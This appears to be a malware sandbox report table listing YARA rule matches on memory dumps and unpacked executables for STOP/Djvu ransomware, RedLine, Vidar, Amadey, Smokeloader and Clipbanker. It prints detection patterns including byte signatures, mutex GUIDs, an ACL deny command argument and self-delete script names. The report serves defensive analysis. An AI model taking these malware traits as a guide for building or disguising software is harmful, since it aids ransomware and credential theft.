0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000026.00000002.509075402.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000023.00000000.481088254.0000000000021000.00000020.00000001.01000000.00000013.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0xe03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000023.00000000.481088254.0000000000021000.00000020.00000001.01000000.00000013.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xafa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 02 00 6A 00 6A 00 FF 15 40 40 02 00 FF 15 2C 40 02 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 02 00 0xb87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xb87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0xf35:$regex3: 56 8B F1 56 FF 15 20 40 02 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000013.00000002.475372910.00000000005F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x67d8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000027.00000000.484270082.0000000001361000.00000020.00000001.01000000.00000014.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0xe03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000027.00000000.484270082.0000000001361000.00000020.00000001.01000000.00000014.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xafa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 36 01 6A 00 6A 00 FF 15 40 40 36 01 FF 15 2C 40 36 01 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 36 01 0xb87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xb87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0xf35:$regex3: 56 8B F1 56 FF 15 20 40 36 01 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000022.00000002.488659141.00000000037A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000001F.00000002.480287492.0000000000710000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.499761929.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.449569254.0000000000650000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000005.00000002.440951446.0000000002300000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000014.00000002.460148088.00000000026A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.379724310.0000000000640000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000023.00000002.484895697.0000000000021000.00000020.00000001.01000000.00000013.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0xe03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000023.00000002.484895697.0000000000021000.00000020.00000001.01000000.00000013.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xafa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 02 00 6A 00 6A 00 FF 15 40 40 02 00 FF 15 2C 40 02 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 02 00 0xb87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xb87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0xf35:$regex3: 56 8B F1 56 FF 15 20 40 02 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001E.00000002.476748443.0000000002130000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000028.00000002.499652756.0000000004275000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
Process Memory Space: 759F.exe PID: 7636	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 759F.exe PID: 7636	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3331e:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 759F.exe PID: 7656	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 759F.exe PID: 7656	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x45a5d:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 759F.exe PID: 7744	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 759F.exe PID: 7744	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4a6d1:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 6C74.exe PID: 7764	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 6C74.exe PID: 7764	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4156c:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 6C74.exe PID: 7824	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 6C74.exe PID: 7824	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4780f:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 759F.exe PID: 7864	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 759F.exe PID: 7864	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x31056:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 759F.exe PID: 7972	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 759F.exe PID: 7972	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x42db9:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 759F.exe PID: 7992	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 759F.exe PID: 7992	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x49f72:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: AF5C.exe PID: 8152	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: AF5C.exe PID: 8152	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x31164:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 6C74.exe PID: 8172	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 6C74.exe PID: 8172	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x470a9:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 9B15.exe PID: 5172	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 9B15.exe PID: 5172	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3ff12:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: AF5C.exe PID: 7180	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: AF5C.exe PID: 7180	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x32e4b:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 6C74.exe PID: 3676	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 6C74.exe PID: 3676	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: 6C74.exe PID: 3676	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x41a89:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 86ED.exe PID: 2300	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 86ED.exe PID: 2300	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x36f62:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 9B15.exe PID: 3312	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 9B15.exe PID: 3312	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x34fda:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 86ED.exe PID: 1476	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 86ED.exe PID: 1476	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3a4d9:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: E8B1.exe PID: 7184	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E8B1.exe PID: 7184	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3feb8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: E8B1.exe PID: 7356	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E8B1.exe PID: 7356	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x38ece:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 759F.exe PID: 7412	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 759F.exe PID: 7412	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x34017:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 6000.exe PID: 7420	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 6000.exe PID: 7420	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x489db:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 759F.exe PID: 7448	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 759F.exe PID: 7448	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x41c4e:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Click to see the 163 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
39.2.mstsca.exe.1360000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
39.2.mstsca.exe.1360000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 36 01 6A 00 6A 00 FF 15 40 40 36 01 FF 15 2C 40 36 01 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 36 01 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 36 01 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
35.0.build3.exe.20000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
35.0.build3.exe.20000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
35.0.build3.exe.20000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 02 00 6A 00 6A 00 FF 15 40 40 02 00 FF 15 2C 40 02 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 02 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 02 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
38.2.build2.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
21.2.6C74.exe.23315a0.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
21.2.6C74.exe.23315a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
21.2.6C74.exe.23315a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
21.2.6C74.exe.23315a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
6.2.759F.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
6.2.759F.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
6.2.759F.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
6.2.759F.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
41.2.759F.exe.23a15a0.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
41.2.759F.exe.23a15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
41.2.759F.exe.23a15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
41.2.759F.exe.23a15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
27.2.86ED.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
27.2.86ED.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
